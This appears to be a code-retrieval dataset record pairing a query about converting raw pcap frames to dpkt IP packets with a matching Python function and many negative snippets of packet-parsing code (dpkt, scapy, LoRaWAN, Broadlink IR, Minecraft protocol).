[ "0.70329154", "0.6592309", "0.64842856", "0.636004", "0.6350439", "0.62164766", "0.6210396", "0.6174336", "0.60854125", "0.6038846", "0.6019747", "0.5920456", "0.58898234", "0.5836752", "0.5829357", "0.57975626", "0.57911247", "0.57865626", "0.5757906", "0.57237977", "0.56982785", "0.5670466", "0.56280106", "0.5623399", "0.56136477", "0.5565839", "0.55417943", "0.553826", "0.54999584", "0.5481485", "0.5429006", "0.5389988", "0.53681016", "0.5364535", "0.53540266", "0.5330461", "0.5313903", "0.5258311", "0.52553076", "0.5252743", "0.52075857", "0.51776886", "0.51615834", "0.5154399", "0.5138357", "0.51138234", "0.5091792", "0.50535995", "0.50399756", "0.50390303", "0.5038519", "0.5016639", "0.49843732", "0.4983607", "0.49828133", "0.4978663", "0.49657962", "0.49612516", "0.49557328", "0.49492064", "0.4940801", "0.49138585", "0.48754483", "0.4873856", "0.48603466", "0.4846721", "0.48449567", "0.48347035", "0.4825368", "0.48093066", "0.4795183", "0.47891828", "0.4784927", "0.47778073", "0.4772032", "0.47718674", "0.475961", "0.47593617", "0.47564438", "0.47563377", "0.47546855", "0.47462574", "0.47453943", "0.47451496", "0.47358912", "0.47303295", "0.47212172", "0.47112647", "0.4709056", "0.4705263", "0.47026858", "0.47023055", "0.4685047", "0.4673811", "0.46697935", "0.4669071", "0.46455127", "0.4644955", "0.4643078", "0.46269092" ]
0.8364727
0
Converts a raw packet to a dpkt packet according to the link type.
def iplayer_from_raw(raw, linktype=1):
    if linktype == 1:  # ethernet
        pkt = dpkt.ethernet.Ethernet(raw)
        ip = pkt.data
    elif linktype == 101:  # raw
        ip = dpkt.ip.IP(raw)
    else:
        raise Exception("unknown PCAP linktype")
    return ip
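For context, a minimal usage sketch (not part of the dataset row itself): it assumes dpkt is installed and that "capture.pcap" is a hypothetical capture file; each raw frame from dpkt's pcap reader is passed in together with the reader's datalink() value as linktype.

import socket
import dpkt

with open("capture.pcap", "rb") as f:         # hypothetical capture file
    reader = dpkt.pcap.Reader(f)
    linktype = reader.datalink()              # 1 = Ethernet, 101 = raw IP
    for ts, raw in reader:
        ip = iplayer_from_raw(raw, linktype)  # extract the IP layer
        if isinstance(ip, dpkt.ip.IP):
            print(ts, socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst))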
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_packet(linktype, packet):\n link_layer = parse_Ethernet(packet) if linktype == pcapy.DLT_EN10MB else parse_Cooked(packet)\n if link_layer['payload_type'] in ['IPv4', 'IPv6']:\n network_layer = parse_IPv4(link_layer['payload']) if link_layer['payload_type'] == 'IPv4' else parse_IPv6(link_layer['payload'])\n if network_layer['payload_type'] in ['UDP', 'TCP']:\n transport_layer = parse_UDP(network_layer['payload']) if network_layer['payload_type'] == 'UDP' else parse_TCP(network_layer['payload'])\n return (link_layer, network_layer, transport_layer)", "def packetize(cls, source, raw_data):\n pkt = cls(source, raw_data)\n\n if pkt.type not in DGTL.descriptors.keys():\n raise Warning('Unsupported packet type! (%s)' % pkt.type)\n\n pkt.set_decoder(DGTL.descriptors[pkt.type][2])\n\n return pkt", "def flowtuple_from_raw(raw, linktype=1):\n ip = iplayer_from_raw(raw, linktype)\n\n if isinstance(ip, dpkt.ip.IP):\n sip, dip = socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst)\n proto = ip.p\n sport, dport = 0, 0\n l3 = ip.data\n # try to get the layer 3 source and destination port, but its ok if this fails,\n # which will happen when we get IP fragments or packets with invalid checksums\n try:\n sport, dport = l3.sport, l3.dport\n except AttributeError:\n pass\n\n else:\n sip, dip, proto = 0, 0, -1\n sport, dport = 0, 0\n\n flowtuple = (sip, dip, sport, dport, proto)\n return flowtuple", "def payload_from_raw(raw, linktype=1):\n ip = iplayer_from_raw(raw, linktype)\n try: return ip.data.data\n except:\n return \"\"", "def to_network_layer(packet):\r\n print(f\"[to_network_layer] packet:{packet}\")", "def decode(cls, data):\n status = struct.unpack('B', data[1])[0]\n # Power ACK is bit 2\n power_ack = (status & 0x04) >> 2\n # Datarate ACK is bit 1\n datarate_ack = (status & 0x02) >> 1\n # Channelmask ACK is bit 0\n channelmask_ack = status & 0x01\n return LinkADRAns(power_ack, datarate_ack, channelmask_ack)", "def make_packet(self, type, data): \n return (\"{}\\x00{}\\x00{}\".format(type, data, self.ID)).encode()", "def __str__(self):\n return '\\n%(source)s > %(type)s (0x%(type_d).2x)\\n%(data)s' % \\\n {'type': DGTL.pkt_type_str[self.type], 'type_d': self.type,\n 'data': str(self.decoded) if self.decoded else 'Unknown raw data.',\n 'source': self.source}", "def decode(cls, raw: bytes) -> \"EthernetHeader\":\n # unsigned char dmac[6];\n # unsigned char smac[6];\n # uint16_t ethertype;\n # unsigned char payload[];\n dmac = raw[:6]\n smac = raw[6:12]\n typ = socket.htons(struct.unpack(\"H\", raw[12:14])[0])\n payload = raw[14:]\n return EthernetHeader(dmac=dmac, smac=smac, typ=typ, payload=payload)", "def decode(self, eth):\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_ARP:\n\t\t\t# print 'arp'\n\t\t\treturn ARP(eth.data).get()\n\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP6:\n\t\t\tip = eth.data\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# multicast is just like IPv4\n\t\t\t\tif udp.dport == 5353:\n\t\t\t\t\t# print udp\n\t\t\t\t\tans = mDNS(udp).get()\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\t# pp.pprint(ans)\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\treturn ans\n\n\t\t\t\t# print 'IPv6 UDP','port:',udp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# TCP not useful\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\tpass\n\t\t\t\t# tcp = ip.data\n\t\t\t\t# print 'IPv6 TCP','port:',tcp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# ICMP error msg not useful for mapping\n\t\t\telif ip.p == 
dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t\t# print 'IPv6 icmp6:',ip.data.data\n\t\t\t\tpass\n\n\t\t\t# other stuff I haven't decoded\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t# print 'IPv6',ip.p,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t\tip = eth.data\n\n\t\t\t# roku interface port: 1900 dst: 239.255.255.250 1900\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# these aren't useful\n\t\t\t\tif udp.dport == 53: # DNS\n\t\t\t\t\t# return DNS(udp.data)\n\t\t\t\t\treturn {}\n\n\t\t\t\telif udp.dport == 5353: # mDNS\n\t\t\t\t\t# print 'mDNS'\n\t\t\t\t\t# print udp\n\t\t\t\t\treturn mDNS(udp).get()\n\n\t\t\t\telif self.getip(ip.dst) == '239.255.255.250':\n\t\t\t\t\treturn {}\n\n\t\t\t\telse:\n\t\t\t\t\t# don't print standard ports\n\t\t\t\t\t# 17500 dropbox\n\t\t\t\t\t# if not ip.data.dport in [17500]:\n\t\t\t\t\t# \tprint 'other udp','port:',udp.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst),': '\n\t\t\t\t\treturn {}\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\t# src = self.getip(ip.src)\n\t\t\t\t# if netaddr.IPAddress(src) not in netaddr.IPNetwork(\"192.168.1.0/24\"):\n\t\t\t\t# \twho = ''\n\t\t\t\t# \tif src not in self.ipMap:\n\t\t\t\t# \t\twho = WhoIs(src).record['NetName']\n\t\t\t\t# \t\tself.ipMap[src] = who\n\t\t\t\t# \telse:\n\t\t\t\t# \t\twho = self.ipMap[src]\n\t\t\t\t# \tif who in ['GOOGLE','AKAMAI','APPLE-WWNET','AMAZO-ZIAD1','DROPBOX']:\n\t\t\t\t# \t\treturn {}\n\t\t\t\t# \telse:\n\t\t\t\t# \t\tprint src,who\n\t\t\t\t# don't print standard ports\n\t\t\t\t# port 58969 - XSANS Apple, why do i see that?\n\t\t\t\t# 22 ssh\n\t\t\t\t# 25 smtp\n\t\t\t\t# 80 http\n\t\t\t\t# 123 time server\n\t\t\t\t# 143 imap\n\t\t\t\t# 443 https\n\t\t\t\t# 445 smb\n\t\t\t\t# 548 afp over tcp\n\t\t\t\t# 5009 airport admin utility\n\t\t\t\t# 5222 ichat\n\t\t\t\t# 17500 dropbox\n\t\t\t\t# if not ip.data.dport in [22,25,80,123,143,443,445,548,5009,5222,17500]:\n\t\t\t\t\t# print 'other tcp','port:',ip.data.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}\n\t\t\t# elif ip.p == dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t# \tprint '?????? 
other icmp6','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telif ip.p == 2:\n\t\t\t\tpass\n\t\t\t\t# print 'IGMP','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telse:\n\t\t\t\t# print 'other ip packet','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}", "def as_packet(self, ptype):\n return ctypes.cast(self.ptr, ctypes.POINTER(ptype))[0]", "def decode(cls, data):\n if len(data) == 0:\n return None\n cid = struct.unpack('B', data[0])[0]\n if cid == LINKCHECKREQ:\n return LinkCheckReq.decode(data)\n elif cid == LINKADRANS:\n return LinkADRAns.decode(data)\n # TODO\n #elif cid == DUTYCYCLEANS:\n # return DutyCycleReq.decode(data)\n #elif cid == RXPARAMSETUPANS:\n # return RxParamSetupReq.decode(data)\n #elif cid == DEVSTATUSANS:\n # return DevStatusReq.decode(data)\n #elif cid == NEWCHANNELANS:\n # return NewChannelReq.decode(data)\n #elif cid == RXTIMINGSETUPANS:\n # return RxTimingSetupReq.decode(data)\n else:\n return None", "def getRecord(self, rr):\n\t\tif rr.type == 1: return {'type': 'a', 'ipv4': socket.inet_ntoa(rr.rdata), 'hostname': rr.name}\n\t\telif rr.type == 28: return {'type': 'aaaa', 'ipv6': socket.inet_ntop(socket.AF_INET6, rr.rdata), 'hostname': rr.name}\n\t\telif rr.type == 5: return {'type': 'cname', 'hostname': rr.name, 'cname': rr.cname}\n\t\telif rr.type == 13: return {'type': 'hostinfo', 'hostname': rr.name, 'info': rr.rdata}\n\t\telif rr.type == 33: return {'type': 'srv', 'hostname': rr.srvname, 'port': rr.port, 'srv': rr.name.split('.')[-3], 'proto': rr.name.split('.')[-2]}\n\t\telif rr.type == 12: return {'type': 'ptr'}\n\t\telif rr.type == 16: return {'type': 'txt'}\n\t\telif rr.type == 10: return {'type': 'wtf'}", "def gen_broadlink_from_raw(data, repeat=0):\n yield from b'\\x26' # IR\n yield from repeat.to_bytes(1, byteorder='big') # Repeat\n\n # all broadlink ir captures will end with\n # 0x00 0x0d 0x05, which is just a long\n # trailing silence in the command set.\n # On generation we just need to ensure\n # our data ends with silence.\n trailing_silience = -101502.0\n\n def encode_one(x):\n # v = abs(int(i / 32.84))\n v = abs(round(x * 269 / 8192))\n if v > 255:\n yield from b'\\x00'\n yield from v.to_bytes(2, byteorder='big')\n else:\n yield from v.to_bytes(1, byteorder='big')\n\n def encode_list(x):\n for i in raw.paired(raw.simplify(x), trailing_silience):\n yield from encode_one(i)\n\n c = bytearray(encode_list(data))\n count = len(c)\n yield from count.to_bytes(2, byteorder='little')\n yield from c\n\n # calculate total length for padding\n count += 4 # header+len+trailer\n count += 4 # rm.send_data() 4 byte header (not seen here)\n if count % 16:\n yield from bytearray(16 - (count % 16))", "def unwrap(self, packet_raw):\n (self.ip_ihl_ver, self.ip_tos_ecn, self.ip_tot_len, self.ip_id, self.ip_flag_frag, \\\n self.ip_ttl, self.ip_proto) = unpack('!BBHHHBB', packet_raw[0:10])\n (self.ip_check) = unpack('H', packet_raw[10:12])\n (src_addr, dest_addr) = unpack('!4s4s', packet_raw[12:20])\n\n self.ip_ihl = self.ip_ihl_ver & 0x0f\n self.ip_ver = (self.ip_ihl_ver & 0xf0) >> 4\n self.ip_tos = (self.ip_tos_ecn & 0xfc) >> 2\n self.ip_ecn = self.ip_tos_ecn & 0x03\n self.ip_flag_df = (self.ip_flag_frag & 0x40) >> 14\n self.ip_flag_mf = (self.ip_flag_frag & 0x20) >> 13\n self.ip_frag_off = self.ip_flag_frag & 0x1f\n\n self.ip_saddr = socket.inet_ntoa(src_addr)\n self.ip_daddr = socket.inet_ntoa(dest_addr)\n self.data = packet_raw[self.ip_ihl*4:self.ip_tot_len]\n\n pesudo_ip_header = packet_raw[0:10] + pack('H', 0) + 
packet_raw[12:20]\n new_chksum = network_chksum(pesudo_ip_header)\n if self.ip_check != new_chksum:\n raise ValueError", "def from_network_layer(buffer):\r\n packet = buffer.get_packet()\r\n # print(f'buffer.message:{buffer.message}')\r\n # if packet == None:\r\n # print(f\"[from_network_layer] packet:NULL\")\r\n print(f\"[from_network_layer] packet:{packet}\")\r\n return packet", "def packet_to_str(packet: PacketDescription, simple_diagrams=False, force_show_frames='', show_timestamp=False) \\\n -> PacketDiagramDescription:\n protocol = packet.protocols_str\n note_color = ''\n packet_str = ''\n if 'NGAP' in protocol:\n if nas_req_regex.search(packet.msg_description) is not None:\n note_color = ' {0}'.format(color_nas_req)\n protocol = 'NAS req.'\n else:\n note_color = ' {0}'.format(color_nas_rsp)\n protocol = 'NGAP msg. or NAS rsp.'\n\n # Search NGAP messages\n ngap_matches = ngap_message_type_regex.finditer(packet.msg_description)\n ngap_message_types = [ngap_match.group(1) for ngap_match in ngap_matches if ngap_match is not None]\n if len(ngap_message_types) > 0:\n ngap_seen = set()\n ngap_seen_add = ngap_seen.add\n ngap_message_types = ['NGAP {0}'.format(x) for x in ngap_message_types if\n not (x in ngap_seen or ngap_seen_add(x))]\n\n # Search NAS messages\n nas_matches = nas_message_type_regex.finditer(packet.msg_description)\n nas_message_types = [nas_match.group(1) for nas_match in nas_matches if nas_match is not None]\n if len(nas_message_types) > 0:\n # Remove duplicates: https://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-whilst-preserving-order\n nas_seen = set()\n nas_seen_add = nas_seen.add\n nas_message_types = ['NAS {0}'.format(x) for x in nas_message_types if\n not (x in nas_seen or nas_seen_add(x))]\n\n # Print msg. type\n joint_ngap_nas_msg_types = ngap_message_types + nas_message_types\n if len(joint_ngap_nas_msg_types) > 0:\n protocol = '{0}'.format(',\\\\n'.join(joint_ngap_nas_msg_types))\n\n elif 'HTTP' in protocol:\n # Some customized filtering based on what we have seen\n rsp_match = http_rsp_regex.search(packet.msg_description)\n req_match = http_url_regex.search(packet.msg_description)\n if ('404 page not found' in packet.msg_description) or (rsp_match is not None):\n note_color = ' {0}'.format(color_http2_rsp)\n if rsp_match is not None:\n protocol = '{0} {1} rsp.'.format(protocol, rsp_match.group(1))\n else:\n protocol = protocol + ' 404 rsp.'\n elif req_match is not None:\n note_color = ' {0}'.format(color_http2_req)\n protocol = protocol + ' req.'\n else:\n note_color = ' {0}'.format(color_http2_req)\n protocol = protocol + ' req. or rsp. 
(no HTTP/2 headers)'\n\n match = list(http_url_regex.finditer(packet.msg_description))\n if len(match) > 0:\n method = ''\n method_match_all = http_method_regex.finditer(packet.msg_description)\n protocols = []\n for idx, method_match in enumerate(method_match_all):\n method = '{0} '.format(method_match.group(1))\n url_split = match[idx].group(1).split('?')\n protocols.append('{0} {1}'.format(method, url_split[0]))\n protocol = '{0}\\\\n'.format(protocol) + '\\\\n'.join(protocols)\n\n elif 'PFCP' in protocol:\n if pfcp_req_regex.search(packet.msg_description) is not None:\n note_color = ' {0}'.format(color_pfcp_req)\n protocol = protocol + ' req.'\n else:\n note_color = ' {0}'.format(color_pfcp_rsp)\n protocol = protocol + ' rsp.'\n\n match = pfcp_message_type_regex.search(packet.msg_description)\n if match is not None:\n protocol = '{0}\\\\n{1}'.format(protocol, match.group(1))\n\n elif 'GTPv2' in protocol:\n if gtpv2_req_regex.search(packet.msg_description) is not None:\n note_color = ' {0}'.format(color_gtpv2_req)\n protocol = protocol + ' req.'\n else:\n note_color = ' {0}'.format(color_gtpv2_rsp)\n protocol = protocol + ' req., rsp. or notification'\n\n match = gtpv2_message_type_regex.search(packet.msg_description)\n if match is not None:\n protocol = '{0}\\\\n{1}'.format(protocol, match.group(1))\n\n elif 'Diameter' in protocol or 'RADIUS' in protocol or \"GTP'\" in protocol:\n note_color = ' {0}'.format(color_diameter_radius_gtpprime)\n protocol = get_diam_description(packet)\n\n if show_timestamp:\n try:\n dt_object = datetime.fromtimestamp(packet.timestamp)\n if dt_object.tzinfo is None:\n tz_str = ''\n else:\n tz_str = ' {0}'.format(dt_object.tzinfo)\n timestamp_hour = ' ({0}:{1}:{2}.{3}{4})'.format(dt_object.hour, dt_object.minute, dt_object.second,\n dt_object.microsecond / 1000, tz_str)\n except:\n timestamp_hour = ''\n protocol = '{0}\\\\n+{1:.3f}s{2}'.format(protocol, packet.timestamp_offsett, timestamp_hour)\n\n frame_number = packet[2]\n packet_str = packet_str + '\"{0}\" -> \"{1}\": {2}, {3}\\n'.format(packet.ip_src, packet.ip_dst, frame_number, protocol)\n packet_str = packet_str + '\\nnote right{0}\\n'.format(note_color)\n\n force_show_frames = [e.strip() for e in force_show_frames.split(',')]\n if simple_diagrams and frame_number not in force_show_frames:\n packet_payload = ''\n else:\n packet_payload = packet.msg_description\n\n if packet_payload != '':\n packet_str = packet_str + '**{0} to {1}**\\n{2}\\n'.format(packet.ip_src, packet.ip_dst, packet_payload)\n else:\n packet_str = packet_str + '**{0} to {1}**\\n'.format(packet.ip_src, packet.ip_dst)\n packet_str = packet_str + 'end note\\n'\n packet_str = packet_str + '\\n'\n return PacketDiagramDescription(packet_str, packet.ip_src, packet.ip_dst, protocol)", "def _parse_packet(packet: StreamMessageResponse) -> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# 
this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def read_raw_packet(self):\n\n size = 0\n\n # Read our two-byte header from the debugger...\n while not size:\n size = (self._get_next_byte() << 16) | self._get_next_byte()\n\n # ... 
and read our packet.\n packet = bytearray([self._get_next_byte() for _ in range(size)])\n\n # Return our packet.\n # TODO: extract and provide status flags\n # TODO: generate a timestamp on-device\n return packet, datetime.now(), None", "def next_connection_packets(piter, linktype=1):\n first_ft = None\n\n for ts, raw in piter:\n ft = flowtuple_from_raw(raw, linktype)\n if not first_ft: first_ft = ft\n\n sip, dip, sport, dport, proto = ft\n if not (first_ft == ft or first_ft == (dip, sip, dport, sport, proto)):\n break\n\n yield {\n \"src\": sip, \"dst\": dip, \"sport\": sport, \"dport\": dport, \"proto\": proto,\n \"raw\": payload_from_raw(raw, linktype).encode(\"base64\"), \"direction\": first_ft == ft,\n }", "def get_packet_type(pkt: packet.Packet) -> dict:\n\n pkt_metadata = {}\n pkt_metadata[\"type\"] = \"unsupported\"\n\n for index, protocol in enumerate(pkt.protocols, start=0):\n if type(protocol) == ipv4.ipv4:\n pkt_metadata[\"ipv4\"] = index\n pkt_metadata[\"ipv4_src\"] = protocol.src\n pkt_metadata[\"ipv4_dst\"] = protocol.dst\n elif type(protocol) == tcp.tcp:\n pkt_metadata[\"type\"] = \"tcp\"\n pkt_metadata[\"tcp\"] = index\n pkt_metadata[\"transport_layer\"] = index # Works for both TCP and UDP\n pkt_metadata[\"src_port\"] = protocol.src_port\n pkt_metadata[\"dst_port\"] = protocol.dst_port\n elif type(protocol) == udp.udp:\n pkt_metadata[\"type\"] = \"udp\"\n pkt_metadata[\"udp\"] = index\n pkt_metadata[\"transport_layer\"] = index # Works for both TCP and UDP\n pkt_metadata[\"src_port\"] = protocol.src_port\n pkt_metadata[\"dst_port\"] = protocol.dst_port\n elif type(protocol) == icmp.icmp:\n pkt_metadata[\"type\"] = \"icmp\"\n pkt_metadata[\"icmp\"] = index\n pkt_metadata[\"icmp_type\"] = protocol.type\n pkt_metadata[\"icmp_code\"] = protocol.code\n\n return pkt_metadata", "def decode_packet(self, bytes):\n b64 = False\n if not isinstance(bytes, six.binary_type):\n bytes = bytes.encode('utf-8')\n\n packet_type = six.byte2int(bytes[0:1])\n if packet_type == ord('b'):\n binary = True\n bytes = bytes[1:]\n packet_type = int(chr(six.byte2int(bytes[0:1])))\n b64 = True\n elif packet_type >= ord('0'):\n packet_type = int(chr(packet_type))\n binary = False\n else:\n binary = True\n\n packet_data = None\n if len(bytes) > 1:\n if binary:\n if b64:\n packet_data = base64.b64decode(bytes[1:])\n else:\n packet_data = bytes[1:]\n else:\n packet_data = bytes[1:].decode('utf-8')\n\n return Packet(packet_type, packet_data, binary)", "def create_packet_definition(packet_to_send):\n source_mac = \"00:00:00:00:00:01\"\n destination_mac = \"00:00:00:00:00:02\"\n source_ip = \"10.10.10.1\"\n destination_ip = \"10.10.10.2\"\n source_ip6 = 'fe80::214:f2ff:fe07:af0'\n destination_ip6 = 'ff02::1'\n sport = 1\n dport = 2\n tos = 4\n if packet_to_send[\"type\"] == \"ip\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}},\n {\"TCP\": {}})\n elif packet_to_send[\"type\"] == \"tagged_ip\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x8100}},\n {\"Dot1Q\": {\"vlan\": packet_to_send[\"vlan\"],\n \"prio\": packet_to_send[\"priority\"]}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}})\n elif packet_to_send[\"type\"] == \"tcp\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}},\n 
{\"TCP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"udp\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}},\n {\"UDP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"double_tagged_ip\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x8100}},\n {\"Dot1Q\": {\"vlan\": packet_to_send[\"outer_vlan\"], \"type\": 0x8100,\n \"prio\": packet_to_send[\"outer_priority\"]}},\n {\"Dot1Q\": {\"vlan\": packet_to_send[\"inner_vlan\"], \"type\": 0x0800,\n \"prio\": packet_to_send[\"inner_priority\"]}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}})\n elif packet_to_send[\"type\"] == \"arp\":\n packet_definition = (\n {\"Ether\": {\"src\": source_mac, \"dst\": 'FF:FF:FF:FF:FF:FF', \"type\": 0x0806}},\n {\"ARP\": {\"op\": 1, \"hwsrc\": source_mac,\n \"psrc\": source_ip, \"pdst\": destination_ip}},)\n elif packet_to_send[\"type\"] == \"arp_reply_tagged\":\n packet_definition = ({\"Ether\": {\"src\": source_mac, \"dst\": destination_mac, \"type\": 0x8100}},\n {\"Dot1Q\": {\"vlan\": 2}},\n {\"ARP\": {\"op\": 2, \"hwsrc\": source_mac, \"hwdst\": destination_mac,\n \"pdst\": destination_ip, \"psrc\": source_ip}}, )\n elif packet_to_send[\"type\"] == \"icmp\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"proto\": 1}},\n {\"ICMP\": {\"type\": 8, \"code\": 0}})\n elif packet_to_send[\"type\"] == \"ipv6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"plen\": 64, \"tc\": 225}})\n elif packet_to_send[\"type\"] == \"tcp6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"tc\": 224, \"nh\": 6}},\n {\"TCP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"udp6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"tc\": 224, \"nh\": 17}},\n {\"UDP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"icmp6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"tc\": 224, \"nh\": 1}},\n {\"ICMP\": {\"type\": 8, \"code\": 0}})\n return packet_definition", "def _scapy_parse(packet: dict) -> Packet:\n try:\n payload_base64 = packet['packet']['payload'].encode()\n\n # assuming it has a Ethernet layer. 
